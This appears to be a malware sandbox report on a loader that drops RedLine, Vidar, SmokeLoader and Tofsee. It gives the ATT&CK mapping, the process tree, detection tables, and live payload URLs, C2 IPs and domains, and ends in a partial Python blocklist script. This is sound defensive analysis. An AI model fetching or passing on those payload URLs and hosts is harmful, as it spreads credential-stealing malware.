                      Source: Yara match | File source: 0000002E.00000002.574236563.000000000074E000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002E.00000002.525192064.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000031.00000002.571891585.0000000002B14000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000027.00000002.537263879.00000000008C7000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002F.00000002.533111165.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002E.00000003.469387095.0000000000980000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002F.00000003.476837740.0000000000ED0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: CBA.exe PID: 7052, type: MEMORYSTR

                      Remote Access Functionality:

                      Yara detected RedLine Stealer
                      Source: Yara match | File source: 33.0.CBA.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 33.2.CBA.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 33.0.CBA.exe.400000.12.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 33.0.CBA.exe.400000.8.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 19.2.CBA.exe.423fe20.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 33.0.CBA.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 33.0.CBA.exe.400000.10.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 19.2.CBA.exe.423fe20.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000031.00000002.609571282.0000000003AA7000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000021.00000000.402116569.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000021.00000000.403620699.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000021.00000000.401238970.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000021.00000002.515289620.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000030.00000003.484873099.00000000034F2000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000031.00000003.491680197.00000000009A3000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000031.00000002.552523209.0000000002515000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000021.00000000.403113050.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000013.00000002.408243360.0000000004121000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000031.00000002.571203673.00000000029E0000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000031.00000002.568085789.0000000002810000.00000004.00020000.sdmp, type: MEMORY
                      Yara detected SmokeLoader
                      Source: Yara match | File source: 1.2.nkINykHreE.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 13.2.haifbcd.4715a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.1.nkINykHreE.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 15.1.haifbcd.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.nkINykHreE.exe.5415a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 14.2.115B.exe.4715a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 16.1.115B.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 15.2.haifbcd.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 16.2.115B.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000003.00000000.282842442.0000000003A61000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000011.00000002.370053936.0000000000751000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000F.00000002.352429754.0000000002091000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000001.00000002.297306514.0000000000580000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000026.00000002.444174815.0000000000951000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000F.00000002.352266837.00000000005C0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000001.00000002.297326406.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000011.00000002.370019662.0000000000620000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000026.00000002.442728079.0000000000630000.00000004.00000001.sdmp, type: MEMORY
                      Yara detected Vidar stealer
                      Source: Yara match | File source: 0000002F.00000002.595854272.0000000000DF0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002E.00000002.574522590.00000000007C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002F.00000002.566415908.0000000000961000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002E.00000002.525192064.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000027.00000002.537263879.00000000008C7000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002F.00000002.533111165.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002E.00000003.469387095.0000000000980000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002F.00000003.476837740.0000000000ED0000.00000004.00000001.sdmp, type: MEMORY
                      Yara detected Tofsee
                      Source: Yara match | File source: 18.2.18D.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 31.2.sdiimdop.exe.540e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 34.2.svchost.exe.2bb0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 31.2.sdiimdop.exe.600000.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 31.2.sdiimdop.exe.600000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 18.2.18D.exe.540e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 31.3.sdiimdop.exe.570000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 18.2.18D.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 18.3.18D.exe.560000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 31.2.sdiimdop.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 31.2.sdiimdop.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 34.2.svchost.exe.2bb0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0000001F.00000002.396765412.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000012.00000002.390911110.0000000000540000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001F.00000003.395236716.0000000000570000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000022.00000002.550647204.0000000002BB0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001F.00000002.396983806.0000000000600000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001F.00000002.396894340.0000000000540000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000012.00000002.390725871.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000012.00000003.369452134.0000000000560000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: 18D.exe PID: 4992, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: sdiimdop.exe PID: 4560, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: svchost.exe PID: 5180, type: MEMORYSTR
                      Source: C:\Users\user\AppData\Local\Temp\18D.exe | Code function: 18_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe | Code function: 31_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,

Mitre Att&ck Matrix

The matrix is reproduced per tactic column, in the row order of the original grid. Techniques followed by digits in parentheses carry the report's superscript signature counts (digits reproduced as extracted); techniques without a count are the matrix template and were not matched by this sample.

Initial Access: Spearphishing Link (1); Valid Accounts (1); Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools; Compromise Software Supply Chain; Compromise Hardware Supply Chain

Execution: Windows Management Instrumentation (1); Native API (11); Exploitation for Client Execution (1); Command and Scripting Interpreter (2); Service Execution (3); Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell; AppleScript; Windows Command Shell; Unix Shell; Visual Basic

Persistence: DLL Side-Loading (1); Application Shimming (1); Valid Accounts (1); Windows Service (14); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd; Scheduled Task

Privilege Escalation: DLL Side-Loading (1); Application Shimming (1); Valid Accounts (1); Access Token Manipulation (1); Windows Service (14); Process Injection (713); Startup Items; Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd; Scheduled Task

Defense Evasion: Disable or Modify Tools (31); Deobfuscate/Decode Files or Information (11); Obfuscated Files or Information (3); Software Packing (34); Timestomp (1); DLL Side-Loading (1); File Deletion (1); Masquerading (131); Valid Accounts (1); Access Token Manipulation (1); Virtualization/Sandbox Evasion (471); Process Injection (713); Hidden Files and Directories (1)

Credential Access: OS Credential Dumping (1); Input Capture (1); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture; Keylogging; GUI Input Capture

Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (2); System Information Discovery (147); Query Registry (1); Security Software Discovery (881); Process Discovery (12); Virtualization/Sandbox Evasion (471); Application Window Discovery (1); System Owner/User Discovery (1); Remote System Discovery (1); Local Groups; Domain Groups

Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools; Taint Shared Content; Replication Through Removable Media; Component Object Model and Distributed COM; Exploitation of Remote Services

Collection: Archive Collected Data (11); Data from Local System (1); Input Capture (1); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging; Screen Capture; Email Collection

Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol; Exfiltration Over Physical Medium; Exfiltration over USB; Commonly Used Port

Command and Control: Ingress Tool Transfer (14); Encrypted Channel (12); Non-Standard Port (1); Non-Application Layer Protocol (4); Application Layer Protocol (35); Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols; DNS; Proxy

Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station

Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups

Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement

Behavior Graph

Behavior Graph ID: 547895; Sample: nkINykHreE.exe; Start date: 04/01/2022; Architecture: WINDOWS; Score: 100

Legend (node types in the graph): Process; Signature; Created File; DNS/IP Info; Is Dropped; Is Windows Process; Number of created Registry Values; Number of created Files; Visual Basic; Delphi; Java; .Net C# or VB.NET; C, C++ or other language; Is malicious; Internet.

The graph, flattened to a process tree. Network contacts, dropped files and signatures are listed under the process node they are attached to; port lists and ASN/country labels are reproduced as given in the graph.

Start node
  Network: 116.202.186.120 (ports 49898, 80; HETZNER-AS, DE, Germany); 65.108.180.72 (ports 49897, 80; ALABANZA-BALT, US, United States); 8 other IPs or domains
  Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Multi AV Scanner detection for domain / URL; Antivirus detection for URL or domain; 15 other signatures
  Started: nkINykHreE.exe; sdiimdop.exe; haifbcd; 8 other processes

nkINykHreE.exe (from the start node)
  Signatures: Contains functionality to inject code into remote processes; Injects a PE file into a foreign processes
  Started: nkINykHreE.exe (child instance)
    nkINykHreE.exe (child instance)
      Signatures: Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)); Maps a DLL or memory area into another process; Checks if the current machine is a virtual machine (disk enumeration)
      Injected into: explorer.exe

explorer.exe (injected by the child nkINykHreE.exe)
  Network: amogohuigotuli.at; 185.233.81.115 (ports 443, 49777, 49778; SUPERSERVERSDATACENTER, RU, Russian Federation); 26 other IPs or domains
  Dropped: C:\Users\user\AppData\Roaming\scifbcd (PE32); C:\Users\user\AppData\Roaming\haifbcd (PE32); C:\Users\user\AppData\Local\Temp\CBA.exe (PE32); 12 other files (11 malicious)
  Signatures: System process connects to network (likely due to code injection or exploit); Benign windows process drops PE files; Deletes itself after installation; Hides that the sample has been downloaded from the Internet (zone.identifier)
  Started: 2757.exe; 18D.exe; 2997.exe; 3 other processes

2757.exe (from explorer.exe)
  Network: 185.7.214.239 (ports 49847, 49876, 49906; DELUNET, DE, France)
  Dropped: C:\Users\user\AppData\...\sqlite3[1].dll (PE32); C:\ProgramData\sqlite3.dll (PE32)
  Signatures: Query firmware table information (likely to detect VMs); Tries to detect sandboxes and other dynamic analysis tools (window names); Machine Learning detection for dropped file; 4 other signatures

18D.exe (from explorer.exe)
  Dropped: C:\Users\user\AppData\Local\...\sdiimdop.exe (PE32)
  Signatures: Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header); Uses netsh to modify the Windows network and firewall settings; Modifies the windows firewall
  Started: cmd.exe (two instances); sc.exe; 3 other processes
    cmd.exe (first instance): dropped C:\Windows\SysWOW64\...\sdiimdop.exe (copy) (PE32); started conhost.exe
    cmd.exe (second instance): started conhost.exe
    sc.exe: started conhost.exe
    3 other processes: started conhost.exe (three instances)

2997.exe (from explorer.exe)
  Signatures: Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)); Maps a DLL or memory area into another process; Checks if the current machine is a virtual machine (disk enumeration); Creates a thread in another existing process (thread injection)

3 other processes (from explorer.exe)
  Network: 91.219.236.18 (port 80; SERVERASTRA-AS, HU, Hungary); 194.180.174.41 (MIVOCLOUD, MD); 194.180.174.53 (port 80; MIVOCLOUD, MD)
  Signatures: Injects a PE file into a foreign processes
  Started: CBA.exe; 115B.exe
    CBA.exe: Network: 86.107.197.138 (ports 38133, 49846; MOD-EU, NL, Romania)

sdiimdop.exe (from the start node; this is the copy under C:\Windows\SysWOW64\dbgxuqbr\ referenced in the code-function entry above)
  Signatures: Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header); Writes to foreign memory regions; Allocates memory in foreign processes
  Started: svchost.exe
    svchost.exe
      Network: patmushta.info 194.87.235.183 (ports 443, 49814, 49904; MTW-AS, RU, Russian Federation); microsoft-com.mail.protection.outlook.com 40.93.207.1 (ports 25, 49813; MICROSOFT-CORP-MSN-AS-BLOCK, US, United States); 192.168.2.1
      Signatures: System process connects to network (likely due to code injection or exploit)

haifbcd (from the start node)
  Signatures: Machine Learning detection for dropped file
  Started: haifbcd (child instance)
    haifbcd (child instance): Signatures: Creates a thread in another existing process (thread injection)

8 other processes (from the start node)
  Network: 127.0.0.1
  Signatures: Changes security center settings (notifications, updates, antivirus, firewall); Maps a DLL or memory area into another process; Checks if the current machine is a virtual machine (disk enumeration); Creates a thread in another existing process (thread injection)
  Started: MpCmdRun.exe
    MpCmdRun.exe: started conhost.exe

Screenshots

(Screenshot thumbnails are not reproduced in this text version of the report.)

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
nkINykHreE.exe | 25% | Virustotal |
nkINykHreE.exe | 26% | ReversingLabs |
nkINykHreE.exe | 100% | Joe Sandbox ML |

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\115B.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\scifbcd | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\CBA.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\4187.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\18D.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\2997.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\315E.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\4BED.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\1B15.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\28C2.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\4583.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\haifbcd | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\sdiimdop.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\2757.exe | 100% | Joe Sandbox ML |
C:\ProgramData\sqlite3.dll | 3% | Metadefender |
C:\ProgramData\sqlite3.dll | 0% | ReversingLabs |

Unpacked PE Files

Source | Detection | Scanner | Label
1.2.nkINykHreE.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
0.2.nkINykHreE.exe.5415a0.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
17.2.2997.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
15.0.haifbcd.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
39.0.2757.exe.1150000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
39.0.2757.exe.1150000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
31.2.sdiimdop.exe.540e50.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
31.3.sdiimdop.exe.570000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
17.3.2997.exe.5d0000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
34.2.svchost.exe.2bb0000.0.unpack | 100% | Avira | BDS/Backdoor.Gen
31.2.sdiimdop.exe.600000.2.unpack | 100% | Avira | BDS/Backdoor.Gen
15.0.haifbcd.400000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
1.1.nkINykHreE.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
39.0.2757.exe.1150000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
18.3.18D.exe.560000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
15.1.haifbcd.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
39.2.2757.exe.1150000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
16.0.115B.exe.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
1.0.nkINykHreE.exe.400000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
18.2.18D.exe.400000.0.unpack | 100% | Avira | BDS/Backdoor.Gen
1.0.nkINykHreE.exe.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
38.3.scifbcd.5e0000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
16.1.115B.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
16.0.115B.exe.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
16.0.115B.exe.400000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
38.2.scifbcd.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
17.2.2997.exe.5c0e50.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
13.2.haifbcd.4715a0.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
15.2.haifbcd.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
38.2.scifbcd.5d0e50.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
39.1.2757.exe.1150000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
39.0.2757.exe.1150000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
39.3.2757.exe.1070000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
18.2.18D.exe.540e50.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
31.2.sdiimdop.exe.400000.0.unpack | 100% | Avira | BDS/Backdoor.Gen
14.2.115B.exe.4715a0.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
1.0.nkINykHreE.exe.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
15.0.haifbcd.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
42.2.4187.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1127993
16.2.115B.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label
http://tempuri.org/Entity/Id12Response | 0% | URL Reputation | safe
http://185.7.214.171:8080/6.php | 100% | URL Reputation | malware
http://65.108.180.72/msvcp140.dll | 10% | Virustotal |
http://65.108.180.72/msvcp140.dll | 100% | Avira URL Cloud | malware
http://tempuri.org/ | 0% | URL Reputation | safe
http://tempuri.org/Entity/Id2Response | 0% | URL Reputation | safe
http://tempuri.org/Entity/Id21Response | 0% | URL Reputation | safe
http://91.243.44.130/stlr/maps.exe | 9% | Virustotal |
http://91.243.44.130/stlr/maps.exe | 100% | Avira URL Cloud | malware
http://65.108.180.72/mozglue.dll | 11% | Virustotal |
http://65.108.180.72/mozglue.dll | 100% | Avira URL Cloud | malware
http://tempuri.org/Entity/Id15Response | 0% | URL Reputation | safe
https://api.ip.sb/ip | 0% | URL Reputation | safe
http://91.219.236.18/capibarl | 100% | Avira URL Cloud | phishing
http://crl.ver) | 0% | Avira URL Cloud | safe
http://65.108.180.72/706 | 0% | Avira URL Cloud | safe
http://tempuri.org/Entity/Id24Response | 0% | URL Reputation | safe
https://dynamic.t | 0% | URL Reputation | safe
http://185.7.214.239/sqlite3.dll | 0% | Avira URL Cloud | safe
http://tempuri.org/Entity/Id5Response | 0% | URL Reputation | safe
http://tempuri.org/Entity/Id10Response | 0% | URL Reputation | safe
http://tempuri.org/Entity/Id8Response | 0% | URL Reputation | safe
http://194.180.174.41/ | 0% | Avira URL Cloud | safe
http://privacytools-foryou-777.com/downloads/toolspab2.exe | 100% | Avira URL Cloud | malware
http://91.219.236.148/capibarN | 0% | Avira URL Cloud | safe
http://116.202.186.120/vcruntime140.dll | 0% | Avira URL Cloud | safe
http://65.108.180.72/freebl3.dll | 100% | Avira URL Cloud | malware
http://data-host-coin-8.com/files/8584_1641133152_551.exe | 100% | Avira URL Cloud | malware
http://data-host-coin-8.com/game.exe | 100% | Avira URL Cloud | malware
http://data-host-coin-8.com/files/2184_1641247228_8717.exe | 100% | Avira URL Cloud | malware
http://91.219.236.148/capibarl | 0% | Avira URL Cloud | safe
http://tempuri.org/Entity/Id13Response | 0% | URL Reputation | safe
http://185.7.214.239/POeNDXYchB.php | 0% | Avira URL Cloud | safe
http://91.219.236.148/capibarg | 0% | Avira URL Cloud | safe
http://91.219.236.18/3 | 100% | Avira URL Cloud | phishing
http://194.180.174.53/capibar0 | 100% | Avira URL Cloud | phishing
http://unic11m.top/install1.exe | 100% | Avira URL Cloud | malware
http://tempuri.org/Entity/Id22Response | 0% | URL Reputation | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Reputation
(The Antivirus Detection column is empty for every entry.)
www.mediafire.com | 104.16.203.237 | true | false | high
kent0mushinec0n3t.casacam.net | 95.143.179.186 | true | false | high
bitly.com | 67.199.248.15 | true | false | high
patmushta.info | 194.87.235.183 | true | false | high
cdn.discordapp.com | 162.159.135.233 | true | false | high
mstdn.social | 116.202.14.219 | true | false | high
natribu.org | 178.248.232.78 | true | false | high
unicupload.top | 54.38.220.85 | true | false | high
qoto.org | 51.91.13.105 | true | false | high
amogohuigotuli.at | 152.0.118.227 | true | false | high
host-data-coin-11.com | 89.223.65.17 | true | false | high
bit.ly | 67.199.248.11 | true | false | high
f0616073.xsph.ru | 141.8.193.236 | true | false | high
f0616068.xsph.ru | 141.8.193.236 | true | false | high
microsoft-com.mail.protection.outlook.com | 40.93.207.1 | true | false | high
f0616071.xsph.ru | 141.8.193.236 | true | false | high
goo.su | 172.67.139.105 | true | false | high
transfer.sh | 144.76.136.153 | true | false | high
privacytools-foryou-777.com | 89.223.65.17 | true | false | high
data-host-coin-8.com | 89.223.65.17 | true | false | high
unic11m.top | 54.38.220.85 | true | false | high
vk.com | 87.240.190.72 | true | false | high
srtuiyhuali.at | unknown | unknown | false | high
fufuiloirtu.com | unknown | unknown | false | high

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://185.7.214.171:8080/6.php | true | URL Reputation: malware | unknown
http://65.108.180.72/msvcp140.dll | true | Virustotal 10%; Avira URL Cloud: malware | unknown
http://91.243.44.130/stlr/maps.exe | true | Virustotal 9%; Avira URL Cloud: malware | unknown
http://65.108.180.72/mozglue.dll | true | Virustotal 11%; Avira URL Cloud: malware | unknown
http://65.108.180.72/706 | true | Avira URL Cloud: safe | unknown
http://185.7.214.239/sqlite3.dll | false | Avira URL Cloud: safe | unknown
http://privacytools-foryou-777.com/downloads/toolspab2.exe | true | Avira URL Cloud: malware | unknown
http://116.202.186.120/vcruntime140.dll | true | Avira URL Cloud: safe | unknown
http://65.108.180.72/freebl3.dll | true | Avira URL Cloud: malware | unknown
http://data-host-coin-8.com/files/8584_1641133152_551.exe | true | Avira URL Cloud: malware | unknown
http://data-host-coin-8.com/game.exe | true | Avira URL Cloud: malware | unknown
http://data-host-coin-8.com/files/2184_1641247228_8717.exe | true | Avira URL Cloud: malware | unknown
http://185.7.214.239/POeNDXYchB.php | false | Avira URL Cloud: safe | unknown
http://f0616073.xsph.ru/Music.exe | false | (none) | high
http://unic11m.top/install1.exe | true | Avira URL Cloud: malware | unknown
http://f0616068.xsph.ru/crp.exe | false | (none) | high
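Two things about these tables matter when turning them into blocking rules. First, the "Malicious" and "Reputation" columns are reputation-feed verdicts, not sandbox verdicts: http://185.7.214.239/sqlite3.dll is rated "safe" and "Malicious: false", yet the behavior graph shows 2757.exe (100% Joe Sandbox ML under Dropped Files) contacting 185.7.214.239 and dropping sqlite3.dll, so a feed-only blocklist misses that host. Second, much of the Contacted Domains list is shared infrastructure (www.mediafire.com, cdn.discordapp.com, bit.ly, transfer.sh, vk.com, mstdn.social, qoto.org); host-blocking those breaks legitimate traffic, so only exact URLs on such hosts should ever be blocked. The script below is an added example, not part of the Joe Sandbox report: it normalises a hand-copied subset of the two tables into hosts, IPs and URLs, pivots on shared resolutions (three of the report's domains resolve to 89.223.65.17), and runs the result over constructed proxy-log lines. The function names, the log format and the SHARED_INFRA set are my choices, not the report's.

```python
"""Normalise the report's contacted-domain / contacted-URL tables into a blocklist
and check proxy-log lines against it (added example; not the sandbox's own code)."""
import ipaddress
from dataclasses import dataclass
from urllib.parse import urlsplit


@dataclass(frozen=True)
class UrlIoc:
    url: str
    malicious: bool   # the report's "Malicious" column
    verdict: str      # the AV / URL-reputation label shown next to it


# Constructed from the "Contacted URLs" table above (hand-copied subset).
REPORT_URLS = [
    UrlIoc("http://185.7.214.171:8080/6.php", True, "malware"),
    UrlIoc("http://65.108.180.72/msvcp140.dll", True, "malware"),
    UrlIoc("http://65.108.180.72/mozglue.dll", True, "malware"),
    UrlIoc("http://65.108.180.72/freebl3.dll", True, "malware"),
    UrlIoc("http://65.108.180.72/706", True, "safe"),
    UrlIoc("http://91.243.44.130/stlr/maps.exe", True, "malware"),
    UrlIoc("http://116.202.186.120/vcruntime140.dll", True, "safe"),
    UrlIoc("http://privacytools-foryou-777.com/downloads/toolspab2.exe", True, "malware"),
    UrlIoc("http://data-host-coin-8.com/game.exe", True, "malware"),
    UrlIoc("http://unic11m.top/install1.exe", True, "malware"),
    UrlIoc("http://185.7.214.239/sqlite3.dll", False, "safe"),
    UrlIoc("http://f0616073.xsph.ru/Music.exe", False, "unknown"),
]

# Constructed from the "Contacted Domains" table: (name, resolved IP). Three attacker
# domains share 89.223.65.17, which the IP pivot in related_domains() uses.
REPORT_DOMAINS = [
    ("patmushta.info", "194.87.235.183"),
    ("data-host-coin-8.com", "89.223.65.17"),
    ("privacytools-foryou-777.com", "89.223.65.17"),
    ("host-data-coin-11.com", "89.223.65.17"),
    ("unic11m.top", "54.38.220.85"),
    ("cdn.discordapp.com", "162.159.135.233"),
    ("bit.ly", "67.199.248.11"),
]

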